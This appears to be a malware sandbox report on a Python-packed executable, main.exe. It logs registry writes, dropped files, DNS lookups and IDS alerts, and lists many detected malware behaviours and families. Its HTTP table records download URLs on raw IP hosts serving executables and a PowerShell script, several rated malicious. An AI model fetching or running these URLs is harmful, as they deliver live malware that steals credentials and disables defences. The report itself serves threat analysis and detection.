0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000B000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000009E90000000000000FF0000000101500200000000120000000000000020ADEE82F77F00000000000000000000FFFFFFFF2D0000001E0000009B90000001000000000000000004200100000000140000000000000040ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009D90000002000000000000000001100100000000130000000000000068ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009C900000030000000000000000011001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C90000004000000000000000102100000000000070000000000000050ABEE82F77F000000000000000000000500000049000000490000009090000005000000000000000104210000000000080000000000000080AAEE82F77F000000000000000000000600000049000000490000009190000006000000000000000104210000000000090000000000000070ABEE82F77F0000000000000000000007000000490000004900000092900000070000000000000001042108000000000A0000000000000088ABEE82F77F0000000000000000000008000000490000004900000093900000080000000000000001042108000000000B00000000000000A8ABEE82F77F0000000000000000000009000000490000004900000039A00000090000000000000001042109000000001C00000000000000C8ABEE82F77F000000000000000000000A00000064000000490000003AA000000A00000000000000000110090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000008000000010000000000000058AAEE82F77F0000000000000000000000000000C60000001E000000B090000000000000FF0000000101500200000000150000000000000088ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B1900000010000000000000000042500000000001600000000000000B8ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B2900000020000000000000000042500000000001800000000000000E0ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B490000003000000000000000004250000000000170000000000000008AEEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B390000004000000000000000004250000000000190000000000000040AEEE82F77F00000000000000000000FFFFFFFFA00000001E000000B5900000050000000000000000042001000000001A0000000000000070AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B6900000060000000000000000042001000000001B00000000000000A0AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B790000007000000000000000004200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA00000000000000000000000000000000000000000000009D200000200000009100000064000000320000006400000050000000320000003200000028000000500000003C0000005000000050000000320000005000000050000000500000005000000050000000500000002800000050000000230000002300000023000000230000005000000050000000500000003200000032000000320000007800000078000000500000003C00000050000000500000009700000032000000780000003200000050000000500000005000000050000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA000000000000000000000000000000000000009D200000200000009100000064000000320000009700000050000000320000003200000028000000500000003C000000500000005000000032000000500000005000000050000000500000005000000050000000500000002800000050000000230000002300000023000000230000005000000050000000500000003200000032000000320000007800000078000000500000003C0000005000000064000000780000003200000078000000780000003200000050000000500000005000000050000000C8000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C0000002D0000002E0000002F00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000002000000030000000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000
(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000030390
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000005026A
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708

Add for printing

Executable files

313

Suspicious files

885

Text files

444

Unknown types

Dropped files

PID	Process	Filename		Type
4772	explorer.exe	C:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat		binary
		MD5:E49C56350AEDF784BFE00E444B879672	SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
7100	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI71002\_cffi_backend.cp313-win_amd64.pyd		executable
		MD5:5CBA92E7C00D09A55F5CBADC8D16CD26	SHA256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
7100	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI71002\_decimal.pyd		executable
		MD5:21FCB8E3D4310346A5DC1A216E7E23CA	SHA256:9A0E05274CAD8D90F6BA6BC594261B36BFBDDF4F5CA6846B6367FE6A4E2FDCE4
7100	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI71002\_bz2.pyd		executable
		MD5:684D656AADA9F7D74F5A5BDCF16D0EDB	SHA256:A5DFB4A663DEF3D2276B88866F6D220F6D30CC777B5D841CF6DBB15C6858017C
7100	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI71002\_asyncio.pyd		executable
		MD5:56F958EEBBC62305B4BF690D61C78E28	SHA256:50631361EF074BE42D788818AF91D0301D22FA24A970F41F496D8272B92CFE31
7100	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI71002\_queue.pyd		executable
		MD5:CC0F4A77CCFE39EFC8019FA8B74C06D0	SHA256:DEE7D19A9FCAB0DF043DC56F2CDC32F1A2A968AB229679B38B378C61CA0CBA53
7100	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI71002\_multiprocessing.pyd		executable
		MD5:807DD90BE59EA971DAC06F3AAB4F2A7E	SHA256:B20DD6F5FAB31476D3D8D7F40CB5AB098117FA5612168C0FF4044945B6156D47
7100	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI71002\api-ms-win-core-console-l1-1-0.dll		executable
		MD5:FC009A82F0FAB71E2C8ADF7F60F489C8	SHA256:D2ADD358A45999E95F67D923F1B4F5A27F5A1A895225121909D716EDF5AE13E7
7100	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI71002\api-ms-win-core-fibers-l1-1-0.dll		executable
		MD5:774133EFCABBCDD10DF784BB26804290	SHA256:B82B2D8E62011F2530F9B3FDEC55CF2869E4FB4133BDB6238BC0EA23FAE72661
7100	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI71002\api-ms-win-core-debug-l1-1-0.dll		executable
		MD5:256B413DCEEB13889ACB526962ACE692	SHA256:7D7F5F231EEEC067A841E4CAE009D9FEB9B5FA0D8FD49EE889BF812B802B9F64

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

468

TCP/UDP connections

8 072

DNS requests

287

Threats

1 934

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3780	main.exe	GET	—	172.245.123.11:80	http://172.245.123.11/new/neww.exe	unknown	—	—	unknown
3780	main.exe	GET	—	185.156.72.2:80	http://185.156.72.2/files/7715417619/kI81c4U.exe	unknown	—	—	unknown
3780	main.exe	GET	—	185.156.72.61:80	http://185.156.72.61/inc/miromangos.exe	unknown	—	—	malicious
3780	main.exe	GET	—	185.156.72.61:80	http://185.156.72.61/inc/game3.exe	unknown	—	—	malicious
3780	main.exe	GET	200	185.156.72.2:80	http://185.156.72.2/files/6299414420/sFFG7Wg.exe	unknown	—	—	unknown
3780	main.exe	GET	—	185.156.72.2:80	http://185.156.72.2/test/donie30.exe	unknown	—	—	unknown
3780	main.exe	GET	200	120.26.119.109:80	http://120.26.119.109/02.08.2022.exe	unknown	—	—	unknown
3780	main.exe	GET	200	43.153.60.198:80	http://43.153.60.198/02.08.2022.exe	unknown	—	—	unknown
3780	main.exe	GET	200	39.101.185.93:8445	http://39.101.185.93:8445/02.08.2022.exe	unknown	—	—	unknown
3780	main.exe	GET	—	172.245.123.11:80	http://172.245.123.11/new/pu.ps1	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
5944	MoUsoCoreWorker.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
1268	svchost.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4372	RUXIMICS.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
3780	main.exe	151.101.2.49:443	urlhaus.abuse.ch	FASTLY	US	whitelisted
3780	main.exe	120.26.119.109:80	—	Hangzhou Alibaba Advertising Co.,Ltd.	CN	unknown
3780	main.exe	117.50.184.253:80	—	China Unicom Beijing Province Network	CN	malicious
3780	main.exe	39.101.185.93:8445	—	Hangzhou Alibaba Advertising Co.,Ltd.	CN	unknown
3780	main.exe	185.156.72.61:80	—	Tov Vaiz Partner	RU	malicious

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	51.124.78.146 40.127.240.158 4.231.128.59 51.104.136.2	whitelisted
google.com	142.250.185.110	whitelisted
urlhaus.abuse.ch	151.101.2.49 151.101.66.49 151.101.130.49 151.101.194.49	whitelisted
file.tuff.cat	89.213.174.56	unknown
cptchvrf.com	185.156.72.25	unknown
cptchvrff.com	185.156.72.25	unknown
fhasjcasd.click	185.156.72.25	malicious
h1dd-page.com	185.156.72.25	unknown
github.com	140.82.121.4 140.82.121.3	whitelisted
raw.githubusercontent.com	185.199.111.133 185.199.108.133 185.199.110.133 185.199.109.133	whitelisted

Threats

PID	Process	Class	Message
3780	main.exe	Potential Corporate Privacy Violation	POLICY [ANY.RUN] Python Suspicious User Agent
3780	main.exe	Potential Corporate Privacy Violation	POLICY [ANY.RUN] Python Suspicious User Agent
3780	main.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
3780	main.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
3780	main.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
3780	main.exe	Potential Corporate Privacy Violation	POLICY [ANY.RUN] Python Suspicious User Agent
3780	main.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
3780	main.exe	Potentially Bad Traffic	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
3780	main.exe	Potential Corporate Privacy Violation	POLICY [ANY.RUN] Python Suspicious User Agent
3780	main.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP

Add for printing

No debug info

General Info

main.exe

C942A56638772644D847709D906FA23D

12D6B77FEC2244CDC4050A083AA741185CC48010

56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A

98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Uses Task Scheduler to autorun other applications

Changes powershell execution policy (Bypass)

Bypass execution policy to execute commands

AMADEY mutex has been found

LUMMA has been found (auto)

REMCOS has been found (auto)

Changes the autorun value in the registry

Registers / Runs the DLL via REGSVR32.EXE

Executing a file with an untrusted certificate

GENERIC has been found (auto)

FORMBOOK has been found (auto)

NJRAT has been found (auto)

Create files in the Startup directory

METASPLOIT has been found (auto)

NETWORM mutex has been found

AZORULT mutex has been detected

METASPLOIT has been detected (SURICATA)

METERPRETER has been detected (SURICATA)

SCREENCONNECT has been found (auto)

REMCOS mutex has been found

REMCOS has been detected

WANNACRY mutex has been found

NESHTA mutex has been found

CLICKFIX has been detected (SURICATA)

PHISHING has been detected (SURICATA)

LCLIPPER mutex has been found

Adds path to the Windows Defender exclusion list

Changes Windows Defender settings

SNAKEKEYLOGGER has been detected (SURICATA)

FORMBOOK has been detected

VIDAR mutex has been found

METASTEALER has been detected (SURICATA)

DCRAT mutex has been found

AUROTUN mutex has been found

REDLINE has been detected (SURICATA)

Connects to the CnC server

Uses sleep, probably for evasion detection (SCRIPT)

QUASAR mutex has been found

Actions looks like stealing of personal data

Steals credentials from Web Browsers

Deletes a file (SCRIPT)

NJRAT mutex has been found

UAC/LUA settings modification

WannaCry Ransomware is detected

AGENTTESLA has been detected (SURICATA)

AMADEY has been detected (SURICATA)

Uses AES cipher (POWERSHELL)

Run PowerShell with an invisible window

Writes a file to the Word startup folder

RANSOMWARE has been detected

ASYNCRAT has been detected (SURICATA)

Modifies files in the Chrome extension folder

Dynamically loads an assembly (POWERSHELL)

Downloads the requested resource (POWERSHELL)

KOI has been detected (SURICATA)

Script downloads file (POWERSHELL)

Scans artifacts that could help determine the target

Uses Task Scheduler to run other applications

FORMBOOK has been detected (SURICATA)

SUSPICIOUS

Executable content was dropped or overwritten

Process drops legitimate windows executable

The process drops C-runtime libraries

Process drops python dynamic module

Application launched itself

Loads Python modules

Starts CMD.EXE for commands execution

The process checks if it is being run in the virtual environment